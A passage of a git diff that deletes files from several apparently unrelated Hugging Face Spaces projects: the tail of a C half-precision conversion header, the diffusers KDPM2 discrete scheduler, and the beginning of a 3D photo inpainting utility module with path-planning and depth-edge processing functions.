0x386E2000, 0x386E4000, 0x386E6000, 0x386E8000, 0x386EA000, 0x386EC000, 0x386EE000, 0x386F0000, 0x386F2000, 0x386F4000, 0x386F6000, 0x386F8000, 0x386FA000, 0x386FC000, 0x386FE000, - 0x38700000, 0x38702000, 0x38704000, 0x38706000, 0x38708000, 0x3870A000, 0x3870C000, 0x3870E000, 0x38710000, 0x38712000, 0x38714000, 0x38716000, 0x38718000, 0x3871A000, 0x3871C000, 0x3871E000, - 0x38720000, 0x38722000, 0x38724000, 0x38726000, 0x38728000, 0x3872A000, 0x3872C000, 0x3872E000, 0x38730000, 0x38732000, 0x38734000, 0x38736000, 0x38738000, 0x3873A000, 0x3873C000, 0x3873E000, - 0x38740000, 0x38742000, 0x38744000, 0x38746000, 0x38748000, 0x3874A000, 0x3874C000, 0x3874E000, 0x38750000, 0x38752000, 0x38754000, 0x38756000, 0x38758000, 0x3875A000, 0x3875C000, 0x3875E000, - 0x38760000, 0x38762000, 0x38764000, 0x38766000, 0x38768000, 0x3876A000, 0x3876C000, 0x3876E000, 0x38770000, 0x38772000, 0x38774000, 0x38776000, 0x38778000, 0x3877A000, 0x3877C000, 0x3877E000, - 0x38780000, 0x38782000, 0x38784000, 0x38786000, 0x38788000, 0x3878A000, 0x3878C000, 0x3878E000, 0x38790000, 0x38792000, 0x38794000, 0x38796000, 0x38798000, 0x3879A000, 0x3879C000, 0x3879E000, - 0x387A0000, 0x387A2000, 0x387A4000, 0x387A6000, 0x387A8000, 0x387AA000, 0x387AC000, 0x387AE000, 0x387B0000, 0x387B2000, 0x387B4000, 0x387B6000, 0x387B8000, 0x387BA000, 0x387BC000, 0x387BE000, - 0x387C0000, 0x387C2000, 0x387C4000, 0x387C6000, 0x387C8000, 0x387CA000, 0x387CC000, 0x387CE000, 0x387D0000, 0x387D2000, 0x387D4000, 0x387D6000, 0x387D8000, 0x387DA000, 0x387DC000, 0x387DE000, - 0x387E0000, 0x387E2000, 0x387E4000, 0x387E6000, 0x387E8000, 0x387EA000, 0x387EC000, 0x387EE000, 0x387F0000, 0x387F2000, 0x387F4000, 0x387F6000, 0x387F8000, 0x387FA000, 0x387FC000, 0x387FE000 - }; - static const unsigned int exponent_table[64] = { - 0x00000000, 0x00800000, 0x01000000, 0x01800000, 0x02000000, 0x02800000, 0x03000000, 0x03800000, 0x04000000, 0x04800000, 0x05000000, 0x05800000, 0x06000000, 0x06800000, 0x07000000, 0x07800000, - 0x08000000, 0x08800000, 0x09000000, 0x09800000, 0x0A000000, 0x0A800000, 0x0B000000, 0x0B800000, 
0x0C000000, 0x0C800000, 0x0D000000, 0x0D800000, 0x0E000000, 0x0E800000, 0x0F000000, 0x47800000, - 0x80000000, 0x80800000, 0x81000000, 0x81800000, 0x82000000, 0x82800000, 0x83000000, 0x83800000, 0x84000000, 0x84800000, 0x85000000, 0x85800000, 0x86000000, 0x86800000, 0x87000000, 0x87800000, - 0x88000000, 0x88800000, 0x89000000, 0x89800000, 0x8A000000, 0x8A800000, 0x8B000000, 0x8B800000, 0x8C000000, 0x8C800000, 0x8D000000, 0x8D800000, 0x8E000000, 0x8E800000, 0x8F000000, 0xC7800000 - }; - static const unsigned short offset_table[64] = { - 0, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, - 0, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024, 1024 - }; - ConversionBits bits; - bits.i32 = mantissa_table[offset_table[value >> 10] + (value & 0x3FF)] + - exponent_table[value >> 10]; - return bits.f32; -} - -// ================================================================================================= - -// CLBLAST_HALF_H_ -#endif diff --git a/spaces/Jackflack09/diffuse-custom/diffusers/schedulers/scheduling_k_dpm_2_discrete.py b/spaces/Jackflack09/diffuse-custom/diffusers/schedulers/scheduling_k_dpm_2_discrete.py deleted file mode 100644 index 8aee346c574c14d52c6b67a2c2275cedc3f6a2cc..0000000000000000000000000000000000000000 --- a/spaces/Jackflack09/diffuse-custom/diffusers/schedulers/scheduling_k_dpm_2_discrete.py +++ /dev/null @@ -1,299 +0,0 @@ -# Copyright 2022 Katherine Crowson, The HuggingFace Team and hlky. All rights reserved. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. - -from typing import List, Optional, Tuple, Union - -import numpy as np -import torch - -from ..configuration_utils import ConfigMixin, register_to_config -from ..utils import _COMPATIBLE_STABLE_DIFFUSION_SCHEDULERS -from .scheduling_utils import SchedulerMixin, SchedulerOutput - - -class KDPM2DiscreteScheduler(SchedulerMixin, ConfigMixin): - """ - Scheduler created by @crowsonkb in [k_diffusion](https://github.com/crowsonkb/k-diffusion), see: - https://github.com/crowsonkb/k-diffusion/blob/5b3af030dd83e0297272d861c19477735d0317ec/k_diffusion/sampling.py#L188 - - Scheduler inspired by DPM-Solver-2 and Algorthim 2 from Karras et al. (2022). - - [`~ConfigMixin`] takes care of storing all config attributes that are passed in the scheduler's `__init__` - function, such as `num_train_timesteps`. They can be accessed via `scheduler.config.num_train_timesteps`. - [`SchedulerMixin`] provides general loading and saving functionality via the [`SchedulerMixin.save_pretrained`] and - [`~SchedulerMixin.from_pretrained`] functions. - - Args: - num_train_timesteps (`int`): number of diffusion steps used to train the model. beta_start (`float`): the - starting `beta` value of inference. beta_end (`float`): the final `beta` value. 
beta_schedule (`str`): - the beta schedule, a mapping from a beta range to a sequence of betas for stepping the model. Choose from - `linear` or `scaled_linear`. - trained_betas (`np.ndarray`, optional): - option to pass an array of betas directly to the constructor to bypass `beta_start`, `beta_end` etc. - options to clip the variance used when adding noise to the denoised sample. Choose from `fixed_small`, - `fixed_small_log`, `fixed_large`, `fixed_large_log`, `learned` or `learned_range`. - prediction_type (`str`, default `epsilon`, optional): - prediction type of the scheduler function, one of `epsilon` (predicting the noise of the diffusion - process), `sample` (directly predicting the noisy sample`) or `v_prediction` (see section 2.4 - https://imagen.research.google/video/paper.pdf) - """ - - _compatibles = _COMPATIBLE_STABLE_DIFFUSION_SCHEDULERS.copy() - order = 2 - - @register_to_config - def __init__( - self, - num_train_timesteps: int = 1000, - beta_start: float = 0.00085, # sensible defaults - beta_end: float = 0.012, - beta_schedule: str = "linear", - trained_betas: Optional[Union[np.ndarray, List[float]]] = None, - prediction_type: str = "epsilon", - ): - if trained_betas is not None: - self.betas = torch.tensor(trained_betas, dtype=torch.float32) - elif beta_schedule == "linear": - self.betas = torch.linspace(beta_start, beta_end, num_train_timesteps, dtype=torch.float32) - elif beta_schedule == "scaled_linear": - # this schedule is very specific to the latent diffusion model. - self.betas = ( - torch.linspace(beta_start**0.5, beta_end**0.5, num_train_timesteps, dtype=torch.float32) ** 2 - ) - else: - raise NotImplementedError(f"{beta_schedule} does is not implemented for {self.__class__}") - - self.alphas = 1.0 - self.betas - self.alphas_cumprod = torch.cumprod(self.alphas, dim=0) - - # set all values - self.set_timesteps(num_train_timesteps, None, num_train_timesteps) - - def index_for_timestep(self, timestep): - indices = (self.timesteps == timestep).nonzero() - if self.state_in_first_order: - pos = -1 - else: - pos = 0 - return indices[pos].item() - - def scale_model_input( - self, - sample: torch.FloatTensor, - timestep: Union[float, torch.FloatTensor], - ) -> torch.FloatTensor: - """ - Args: - Ensures interchangeability with schedulers that need to scale the denoising model input depending on the - current timestep. - sample (`torch.FloatTensor`): input sample timestep (`int`, optional): current timestep - Returns: - `torch.FloatTensor`: scaled input sample - """ - step_index = self.index_for_timestep(timestep) - - if self.state_in_first_order: - sigma = self.sigmas[step_index] - else: - sigma = self.sigmas_interpol[step_index] - - sample = sample / ((sigma**2 + 1) ** 0.5) - return sample - - def set_timesteps( - self, - num_inference_steps: int, - device: Union[str, torch.device] = None, - num_train_timesteps: Optional[int] = None, - ): - """ - Sets the timesteps used for the diffusion chain. Supporting function to be run before inference. - - Args: - num_inference_steps (`int`): - the number of diffusion steps used when generating samples with a pre-trained model. - device (`str` or `torch.device`, optional): - the device to which the timesteps should be moved to. If `None`, the timesteps are not moved. 
- """ - self.num_inference_steps = num_inference_steps - - num_train_timesteps = num_train_timesteps or self.config.num_train_timesteps - - timesteps = np.linspace(0, num_train_timesteps - 1, num_inference_steps, dtype=float)[::-1].copy() - - sigmas = np.array(((1 - self.alphas_cumprod) / self.alphas_cumprod) ** 0.5) - self.log_sigmas = torch.from_numpy(np.log(sigmas)).to(device) - - sigmas = np.interp(timesteps, np.arange(0, len(sigmas)), sigmas) - sigmas = np.concatenate([sigmas, [0.0]]).astype(np.float32) - sigmas = torch.from_numpy(sigmas).to(device=device) - - # interpolate sigmas - sigmas_interpol = sigmas.log().lerp(sigmas.roll(1).log(), 0.5).exp() - - self.sigmas = torch.cat([sigmas[:1], sigmas[1:].repeat_interleave(2), sigmas[-1:]]) - self.sigmas_interpol = torch.cat( - [sigmas_interpol[:1], sigmas_interpol[1:].repeat_interleave(2), sigmas_interpol[-1:]] - ) - - # standard deviation of the initial noise distribution - self.init_noise_sigma = self.sigmas.max() - - timesteps = torch.from_numpy(timesteps).to(device) - - # interpolate timesteps - timesteps_interpol = self.sigma_to_t(sigmas_interpol).to(device) - interleaved_timesteps = torch.stack((timesteps_interpol[1:-1, None], timesteps[1:, None]), dim=-1).flatten() - timesteps = torch.cat([timesteps[:1], interleaved_timesteps]) - - if str(device).startswith("mps"): - # mps does not support float64 - self.timesteps = timesteps.to(torch.float32) - else: - self.timesteps = timesteps - - self.sample = None - - def sigma_to_t(self, sigma): - # get log sigma - log_sigma = sigma.log() - - # get distribution - dists = log_sigma - self.log_sigmas[:, None] - - # get sigmas range - low_idx = dists.ge(0).cumsum(dim=0).argmax(dim=0).clamp(max=self.log_sigmas.shape[0] - 2) - high_idx = low_idx + 1 - - low = self.log_sigmas[low_idx] - high = self.log_sigmas[high_idx] - - # interpolate sigmas - w = (low - log_sigma) / (low - high) - w = w.clamp(0, 1) - - # transform interpolation to time range - t = (1 - w) * low_idx + w * high_idx - t = t.view(sigma.shape) - return t - - @property - def state_in_first_order(self): - return self.sample is None - - def step( - self, - model_output: Union[torch.FloatTensor, np.ndarray], - timestep: Union[float, torch.FloatTensor], - sample: Union[torch.FloatTensor, np.ndarray], - return_dict: bool = True, - ) -> Union[SchedulerOutput, Tuple]: - """ - Args: - Predict the sample at the previous timestep by reversing the SDE. Core function to propagate the diffusion - process from the learned model outputs (most often the predicted noise). - model_output (`torch.FloatTensor` or `np.ndarray`): direct output from learned diffusion model. timestep - (`int`): current discrete timestep in the diffusion chain. sample (`torch.FloatTensor` or `np.ndarray`): - current instance of sample being created by diffusion process. - return_dict (`bool`): option for returning tuple rather than SchedulerOutput class - Returns: - [`~schedulers.scheduling_utils.SchedulerOutput`] or `tuple`: - [`~schedulers.scheduling_utils.SchedulerOutput`] if `return_dict` is True, otherwise a `tuple`. When - returning a tuple, the first element is the sample tensor. 
- """ - step_index = self.index_for_timestep(timestep) - - if self.state_in_first_order: - sigma = self.sigmas[step_index] - sigma_interpol = self.sigmas_interpol[step_index + 1] - sigma_next = self.sigmas[step_index + 1] - else: - # 2nd order / KDPM2's method - sigma = self.sigmas[step_index - 1] - sigma_interpol = self.sigmas_interpol[step_index] - sigma_next = self.sigmas[step_index] - - # currently only gamma=0 is supported. This usually works best anyways. - # We can support gamma in the future but then need to scale the timestep before - # passing it to the model which requires a change in API - gamma = 0 - sigma_hat = sigma * (gamma + 1) # Note: sigma_hat == sigma for now - - # 1. compute predicted original sample (x_0) from sigma-scaled predicted noise - if self.config.prediction_type == "epsilon": - sigma_input = sigma_hat if self.state_in_first_order else sigma_interpol - pred_original_sample = sample - sigma_input * model_output - elif self.config.prediction_type == "v_prediction": - sigma_input = sigma_hat if self.state_in_first_order else sigma_interpol - pred_original_sample = model_output * (-sigma_input / (sigma_input**2 + 1) ** 0.5) + ( - sample / (sigma_input**2 + 1) - ) - else: - raise ValueError( - f"prediction_type given as {self.config.prediction_type} must be one of `epsilon`, or `v_prediction`" - ) - - if self.state_in_first_order: - # 2. Convert to an ODE derivative for 1st order - derivative = (sample - pred_original_sample) / sigma_hat - # 3. delta timestep - dt = sigma_interpol - sigma_hat - - # store for 2nd order step - self.sample = sample - else: - # DPM-Solver-2 - # 2. Convert to an ODE derivative for 2nd order - derivative = (sample - pred_original_sample) / sigma_interpol - - # 3. delta timestep - dt = sigma_next - sigma_hat - - sample = self.sample - self.sample = None - - prev_sample = sample + derivative * dt - - if not return_dict: - return (prev_sample,) - - return SchedulerOutput(prev_sample=prev_sample) - - def add_noise( - self, - original_samples: torch.FloatTensor, - noise: torch.FloatTensor, - timesteps: torch.FloatTensor, - ) -> torch.FloatTensor: - # Make sure sigmas and timesteps have the same device and dtype as original_samples - self.sigmas = self.sigmas.to(device=original_samples.device, dtype=original_samples.dtype) - if original_samples.device.type == "mps" and torch.is_floating_point(timesteps): - # mps does not support float64 - self.timesteps = self.timesteps.to(original_samples.device, dtype=torch.float32) - timesteps = timesteps.to(original_samples.device, dtype=torch.float32) - else: - self.timesteps = self.timesteps.to(original_samples.device) - timesteps = timesteps.to(original_samples.device) - - step_indices = [self.index_for_timestep(t) for t in timesteps] - - sigma = self.sigmas[step_indices].flatten() - while len(sigma.shape) < len(original_samples.shape): - sigma = sigma.unsqueeze(-1) - - noisy_samples = original_samples + noise * sigma - return noisy_samples - - def __len__(self): - return self.config.num_train_timesteps diff --git a/spaces/Jacks2003/3D_Photo_Inpainting/utils.py b/spaces/Jacks2003/3D_Photo_Inpainting/utils.py deleted file mode 100644 index 808e48b1979d16f32c050f43f1f6c0ca36d8d18b..0000000000000000000000000000000000000000 --- a/spaces/Jacks2003/3D_Photo_Inpainting/utils.py +++ /dev/null @@ -1,1416 +0,0 @@ -import os -import glob -import cv2 -import scipy.misc as misc -from skimage.transform import resize -import numpy as np -from functools import reduce -from operator import mul -import torch -from torch 
import nn -import matplotlib.pyplot as plt -import re -try: - import cynetworkx as netx -except ImportError: - import networkx as netx -from scipy.ndimage import gaussian_filter -from skimage.feature import canny -import collections -import shutil -import imageio -import copy -from matplotlib import pyplot as plt -from mpl_toolkits.mplot3d import Axes3D -import time -from scipy.interpolate import interp1d -from collections import namedtuple - -def path_planning(num_frames, x, y, z, path_type=''): - if path_type == 'straight-line': - corner_points = np.array([[0, 0, 0], [(0 + x) * 0.5, (0 + y) * 0.5, (0 + z) * 0.5], [x, y, z]]) - corner_t = np.linspace(0, 1, len(corner_points)) - t = np.linspace(0, 1, num_frames) - cs = interp1d(corner_t, corner_points, axis=0, kind='quadratic') - spline = cs(t) - xs, ys, zs = [xx.squeeze() for xx in np.split(spline, 3, 1)] - elif path_type == 'double-straight-line': - corner_points = np.array([[-x, -y, -z], [0, 0, 0], [x, y, z]]) - corner_t = np.linspace(0, 1, len(corner_points)) - t = np.linspace(0, 1, num_frames) - cs = interp1d(corner_t, corner_points, axis=0, kind='quadratic') - spline = cs(t) - xs, ys, zs = [xx.squeeze() for xx in np.split(spline, 3, 1)] - elif path_type == 'circle': - xs, ys, zs = [], [], [] - for frame_id, bs_shift_val in enumerate(np.arange(-2.0, 2.0, (4./num_frames))): - xs += [np.cos(bs_shift_val * np.pi) * 1 * x] - ys += [np.sin(bs_shift_val * np.pi) * 1 * y] - zs += [np.cos(bs_shift_val * np.pi/2.) * 1 * z] - xs, ys, zs = np.array(xs), np.array(ys), np.array(zs) - - return xs, ys, zs - -def open_small_mask(mask, context, open_iteration, kernel): - np_mask = mask.cpu().data.numpy().squeeze().astype(np.uint8) - raw_mask = np_mask.copy() - np_context = context.cpu().data.numpy().squeeze().astype(np.uint8) - np_input = np_mask + np_context - for _ in range(open_iteration): - np_input = cv2.erode(cv2.dilate(np_input, np.ones((kernel, kernel)), iterations=1), np.ones((kernel,kernel)), iterations=1) - np_mask[(np_input - np_context) > 0] = 1 - out_mask = torch.FloatTensor(np_mask).to(mask)[None, None, ...] 
- - return out_mask - -def filter_irrelevant_edge_new(self_edge, comp_edge, other_edges, other_edges_with_id, current_edge_id, context, depth, mesh, context_cc, spdb=False): - other_edges = other_edges.squeeze().astype(np.uint8) - other_edges_with_id = other_edges_with_id.squeeze() - self_edge = self_edge.squeeze() - dilate_bevel_self_edge = cv2.dilate((self_edge + comp_edge).astype(np.uint8), np.array([[1,1,1],[1,1,1],[1,1,1]]), iterations=1) - dilate_cross_self_edge = cv2.dilate((self_edge + comp_edge).astype(np.uint8), np.array([[0,1,0],[1,1,1],[0,1,0]]).astype(np.uint8), iterations=1) - edge_ids = np.unique(other_edges_with_id * context + (-1) * (1 - context)).astype(np.int) - end_depth_maps = np.zeros_like(self_edge) - self_edge_ids = np.sort(np.unique(other_edges_with_id[self_edge > 0]).astype(np.int)) - self_edge_ids = self_edge_ids[1:] if self_edge_ids.shape[0] > 0 and self_edge_ids[0] == -1 else self_edge_ids - self_comp_ids = np.sort(np.unique(other_edges_with_id[comp_edge > 0]).astype(np.int)) - self_comp_ids = self_comp_ids[1:] if self_comp_ids.shape[0] > 0 and self_comp_ids[0] == -1 else self_comp_ids - edge_ids = edge_ids[1:] if edge_ids[0] == -1 else edge_ids - other_edges_info = [] - extend_other_edges = np.zeros_like(other_edges) - if spdb is True: - f, ((ax1, ax2, ax3)) = plt.subplots(1, 3, sharex=True, sharey=True); ax1.imshow(self_edge); ax2.imshow(context); ax3.imshow(other_edges_with_id * context + (-1) * (1 - context)); plt.show() - import pdb; pdb.set_trace() - filter_self_edge = np.zeros_like(self_edge) - for self_edge_id in self_edge_ids: - filter_self_edge[other_edges_with_id == self_edge_id] = 1 - dilate_self_comp_edge = cv2.dilate(comp_edge, kernel=np.ones((3, 3)), iterations=2) - valid_self_comp_edge = np.zeros_like(comp_edge) - for self_comp_id in self_comp_ids: - valid_self_comp_edge[self_comp_id == other_edges_with_id] = 1 - self_comp_edge = dilate_self_comp_edge * valid_self_comp_edge - filter_self_edge = (filter_self_edge + self_comp_edge).clip(0, 1) - for edge_id in edge_ids: - other_edge_locs = (other_edges_with_id == edge_id).astype(np.uint8) - condition = (other_edge_locs * other_edges * context.astype(np.uint8)) - end_cross_point = dilate_cross_self_edge * condition * (1 - filter_self_edge) - end_bevel_point = dilate_bevel_self_edge * condition * (1 - filter_self_edge) - if end_bevel_point.max() != 0: - end_depth_maps[end_bevel_point != 0] = depth[end_bevel_point != 0] - if end_cross_point.max() == 0: - nxs, nys = np.where(end_bevel_point != 0) - for nx, ny in zip(nxs, nys): - bevel_node = [xx for xx in context_cc if xx[0] == nx and xx[1] == ny][0] - for ne in mesh.neighbors(bevel_node): - if other_edges_with_id[ne[0], ne[1]] > -1 and dilate_cross_self_edge[ne[0], ne[1]] > 0: - extend_other_edges[ne[0], ne[1]] = 1 - break - else: - other_edges[other_edges_with_id == edge_id] = 0 - other_edges = (other_edges + extend_other_edges).clip(0, 1) * context - - return other_edges, end_depth_maps, other_edges_info - -def clean_far_edge_new(input_edge, end_depth_maps, mask, context, global_mesh, info_on_pix, self_edge, inpaint_id, config): - mesh = netx.Graph() - hxs, hys = np.where(input_edge * mask > 0) - valid_near_edge = (input_edge != 0).astype(np.uint8) * context - valid_map = mask + context - invalid_edge_ids = [] - for hx, hy in zip(hxs, hys): - node = (hx ,hy) - mesh.add_node((hx, hy)) - eight_nes = [ne for ne in [(hx + 1, hy), (hx - 1, hy), (hx, hy + 1), (hx, hy - 1), \ - (hx + 1, hy + 1), (hx - 1, hy - 1), (hx - 1, hy + 1), (hx + 1, hy - 1)]\ - if 0 
<= ne[0] < input_edge.shape[0] and 0 <= ne[1] < input_edge.shape[1] and 0 < input_edge[ne[0], ne[1]]] # or end_depth_maps[ne[0], ne[1]] != 0] - for ne in eight_nes: - mesh.add_edge(node, ne, length=np.hypot(ne[0] - hx, ne[1] - hy)) - if end_depth_maps[ne[0], ne[1]] != 0: - mesh.nodes[ne[0], ne[1]]['cnt'] = True - if end_depth_maps[ne[0], ne[1]] == 0: - import pdb; pdb.set_trace() - mesh.nodes[ne[0], ne[1]]['depth'] = end_depth_maps[ne[0], ne[1]] - elif mask[ne[0], ne[1]] != 1: - four_nes = [nne for nne in [(ne[0] + 1, ne[1]), (ne[0] - 1, ne[1]), (ne[0], ne[1] + 1), (ne[0], ne[1] - 1)]\ - if nne[0] < end_depth_maps.shape[0] and nne[0] >= 0 and nne[1] < end_depth_maps.shape[1] and nne[1] >= 0] - for nne in four_nes: - if end_depth_maps[nne[0], nne[1]] != 0: - mesh.add_edge(nne, ne, length=np.hypot(nne[0] - ne[0], nne[1] - ne[1])) - mesh.nodes[nne[0], nne[1]]['cnt'] = True - mesh.nodes[nne[0], nne[1]]['depth'] = end_depth_maps[nne[0], nne[1]] - ccs = [*netx.connected_components(mesh)] - end_pts = [] - for cc in ccs: - end_pts.append(set()) - for node in cc: - if mesh.nodes[node].get('cnt') is not None: - end_pts[-1].add((node[0], node[1], mesh.nodes[node]['depth'])) - predef_npaths = [None for _ in range(len(ccs))] - fpath_map = np.zeros_like(input_edge) - 1 - npath_map = np.zeros_like(input_edge) - 1 - npaths, fpaths = dict(), dict() - break_flag = False - end_idx = 0 - while end_idx < len(end_pts): - end_pt, cc = [*zip(end_pts, ccs)][end_idx] - end_idx += 1 - sorted_end_pt = [] - fpath = [] - iter_fpath = [] - if len(end_pt) > 2 or len(end_pt) == 0: - if len(end_pt) > 2: - continue - continue - if len(end_pt) == 2: - ravel_end = [*end_pt] - tmp_sub_mesh = mesh.subgraph(list(cc)).copy() - tmp_npath = [*netx.shortest_path(tmp_sub_mesh, (ravel_end[0][0], ravel_end[0][1]), (ravel_end[1][0], ravel_end[1][1]), weight='length')] - fpath_map1, npath_map1, disp_diff1 = plan_path(mesh, info_on_pix, cc, ravel_end[0:1], global_mesh, input_edge, mask, valid_map, inpaint_id, npath_map=None, fpath_map=None, npath=tmp_npath) - fpath_map2, npath_map2, disp_diff2 = plan_path(mesh, info_on_pix, cc, ravel_end[1:2], global_mesh, input_edge, mask, valid_map, inpaint_id, npath_map=None, fpath_map=None, npath=tmp_npath) - tmp_disp_diff = [disp_diff1, disp_diff2] - self_end = [] - edge_len = [] - ds_edge = cv2.dilate(self_edge.astype(np.uint8), np.ones((3, 3)), iterations=1) - if ds_edge[ravel_end[0][0], ravel_end[0][1]] > 0: - self_end.append(1) - else: - self_end.append(0) - if ds_edge[ravel_end[1][0], ravel_end[1][1]] > 0: - self_end.append(1) - else: - self_end.append(0) - edge_len = [np.count_nonzero(npath_map1), np.count_nonzero(npath_map2)] - sorted_end_pts = [xx[0] for xx in sorted(zip(ravel_end, self_end, edge_len, [disp_diff1, disp_diff2]), key=lambda x: (x[1], x[2]), reverse=True)] - re_npath_map1, re_fpath_map1 = (npath_map1 != -1).astype(np.uint8), (fpath_map1 != -1).astype(np.uint8) - re_npath_map2, re_fpath_map2 = (npath_map2 != -1).astype(np.uint8), (fpath_map2 != -1).astype(np.uint8) - if np.count_nonzero(re_npath_map1 * re_npath_map2 * mask) / \ - (np.count_nonzero((re_npath_map1 + re_npath_map2) * mask) + 1e-6) > 0.5\ - and np.count_nonzero(re_fpath_map1 * re_fpath_map2 * mask) / \ - (np.count_nonzero((re_fpath_map1 + re_fpath_map2) * mask) + 1e-6) > 0.5\ - and tmp_disp_diff[0] != -1 and tmp_disp_diff[1] != -1: - my_fpath_map, my_npath_map, npath, fpath = \ - plan_path_e2e(mesh, cc, sorted_end_pts, global_mesh, input_edge, mask, valid_map, inpaint_id, npath_map=None, fpath_map=None) - 
npath_map[my_npath_map != -1] = my_npath_map[my_npath_map != -1] - fpath_map[my_fpath_map != -1] = my_fpath_map[my_fpath_map != -1] - if len(fpath) > 0: - edge_id = global_mesh.nodes[[*sorted_end_pts][0]]['edge_id'] - fpaths[edge_id] = fpath - npaths[edge_id] = npath - invalid_edge_ids.append(edge_id) - else: - if tmp_disp_diff[0] != -1: - ratio_a = tmp_disp_diff[0] / (np.sum(tmp_disp_diff) + 1e-8) - else: - ratio_a = 0 - if tmp_disp_diff[1] != -1: - ratio_b = tmp_disp_diff[1] / (np.sum(tmp_disp_diff) + 1e-8) - else: - ratio_b = 0 - npath_len = len(tmp_npath) - if npath_len > config['depth_edge_dilate_2'] * 2: - npath_len = npath_len - (config['depth_edge_dilate_2'] * 1) - tmp_npath_a = tmp_npath[:int(np.floor(npath_len * ratio_a))] - tmp_npath_b = tmp_npath[::-1][:int(np.floor(npath_len * ratio_b))] - tmp_merge = [] - if len(tmp_npath_a) > 0 and sorted_end_pts[0][0] == tmp_npath_a[0][0] and sorted_end_pts[0][1] == tmp_npath_a[0][1]: - if len(tmp_npath_a) > 0 and mask[tmp_npath_a[-1][0], tmp_npath_a[-1][1]] > 0: - tmp_merge.append([sorted_end_pts[:1], tmp_npath_a]) - if len(tmp_npath_b) > 0 and mask[tmp_npath_b[-1][0], tmp_npath_b[-1][1]] > 0: - tmp_merge.append([sorted_end_pts[1:2], tmp_npath_b]) - elif len(tmp_npath_b) > 0 and sorted_end_pts[0][0] == tmp_npath_b[0][0] and sorted_end_pts[0][1] == tmp_npath_b[0][1]: - if len(tmp_npath_b) > 0 and mask[tmp_npath_b[-1][0], tmp_npath_b[-1][1]] > 0: - tmp_merge.append([sorted_end_pts[:1], tmp_npath_b]) - if len(tmp_npath_a) > 0 and mask[tmp_npath_a[-1][0], tmp_npath_a[-1][1]] > 0: - tmp_merge.append([sorted_end_pts[1:2], tmp_npath_a]) - for tmp_idx in range(len(tmp_merge)): - if len(tmp_merge[tmp_idx][1]) == 0: - continue - end_pts.append(tmp_merge[tmp_idx][0]) - ccs.append(set(tmp_merge[tmp_idx][1])) - if len(end_pt) == 1: - sub_mesh = mesh.subgraph(list(cc)).copy() - pnodes = netx.periphery(sub_mesh) - if len(end_pt) == 1: - ends = [*end_pt] - elif len(sorted_end_pt) == 1: - ends = [*sorted_end_pt] - else: - import pdb; pdb.set_trace() - try: - edge_id = global_mesh.nodes[ends[0]]['edge_id'] - except: - import pdb; pdb.set_trace() - pnodes = sorted(pnodes, - key=lambda x: np.hypot((x[0] - ends[0][0]), (x[1] - ends[0][1])), - reverse=True)[0] - npath = [*netx.shortest_path(sub_mesh, (ends[0][0], ends[0][1]), pnodes, weight='length')] - for np_node in npath: - npath_map[np_node[0], np_node[1]] = edge_id - fpath = [] - if global_mesh.nodes[ends[0]].get('far') is None: - print("None far") - else: - fnodes = global_mesh.nodes[ends[0]].get('far') - dmask = mask + 0 - did = 0 - while True: - did += 1 - dmask = cv2.dilate(dmask, np.ones((3, 3)), iterations=1) - if did > 3: - break - ffnode = [fnode for fnode in fnodes if (dmask[fnode[0], fnode[1]] > 0 and mask[fnode[0], fnode[1]] == 0 and\ - global_mesh.nodes[fnode].get('inpaint_id') != inpaint_id + 1)] - if len(ffnode) > 0: - fnode = ffnode[0] - break - if len(ffnode) == 0: - continue - fpath.append((fnode[0], fnode[1])) - barrel_dir = np.array([[1, 0], [1, 1], [0, 1], [-1, 1], [-1, 0], [-1, -1], [0, -1], [1, -1]]) - n2f_dir = (int(fnode[0] - npath[0][0]), int(fnode[1] - npath[0][1])) - while True: - if barrel_dir[0, 0] == n2f_dir[0] and barrel_dir[0, 1] == n2f_dir[1]: - n2f_barrel = barrel_dir.copy() - break - barrel_dir = np.roll(barrel_dir, 1, axis=0) - for step in range(0, len(npath)): - if step == 0: - continue - elif step == 1: - next_dir = (npath[step][0] - npath[step - 1][0], npath[step][1] - npath[step - 1][1]) - while True: - if barrel_dir[0, 0] == next_dir[0] and barrel_dir[0, 1] == 
next_dir[1]: - next_barrel = barrel_dir.copy() - break - barrel_dir = np.roll(barrel_dir, 1, axis=0) - barrel_pair = np.stack((n2f_barrel, next_barrel), axis=0) - n2f_dir = (barrel_pair[0, 0, 0], barrel_pair[0, 0, 1]) - elif step > 1: - next_dir = (npath[step][0] - npath[step - 1][0], npath[step][1] - npath[step - 1][1]) - while True: - if barrel_pair[1, 0, 0] == next_dir[0] and barrel_pair[1, 0, 1] == next_dir[1]: - next_barrel = barrel_pair.copy() - break - barrel_pair = np.roll(barrel_pair, 1, axis=1) - n2f_dir = (barrel_pair[0, 0, 0], barrel_pair[0, 0, 1]) - new_locs = [] - if abs(n2f_dir[0]) == 1: - new_locs.append((npath[step][0] + n2f_dir[0], npath[step][1])) - if abs(n2f_dir[1]) == 1: - new_locs.append((npath[step][0], npath[step][1] + n2f_dir[1])) - if len(new_locs) > 1: - new_locs = sorted(new_locs, key=lambda xx: np.hypot((xx[0] - fpath[-1][0]), (xx[1] - fpath[-1][1]))) - break_flag = False - for new_loc in new_locs: - new_loc_nes = [xx for xx in [(new_loc[0] + 1, new_loc[1]), (new_loc[0] - 1, new_loc[1]), - (new_loc[0], new_loc[1] + 1), (new_loc[0], new_loc[1] - 1)]\ - if xx[0] >= 0 and xx[0] < fpath_map.shape[0] and xx[1] >= 0 and xx[1] < fpath_map.shape[1]] - if np.all([(fpath_map[nlne[0], nlne[1]] == -1) for nlne in new_loc_nes]) != True: - break - if npath_map[new_loc[0], new_loc[1]] != -1: - if npath_map[new_loc[0], new_loc[1]] != edge_id: - break_flag = True - break - else: - continue - if valid_map[new_loc[0], new_loc[1]] == 0: - break_flag = True - break - fpath.append(new_loc) - if break_flag is True: - break - if step != 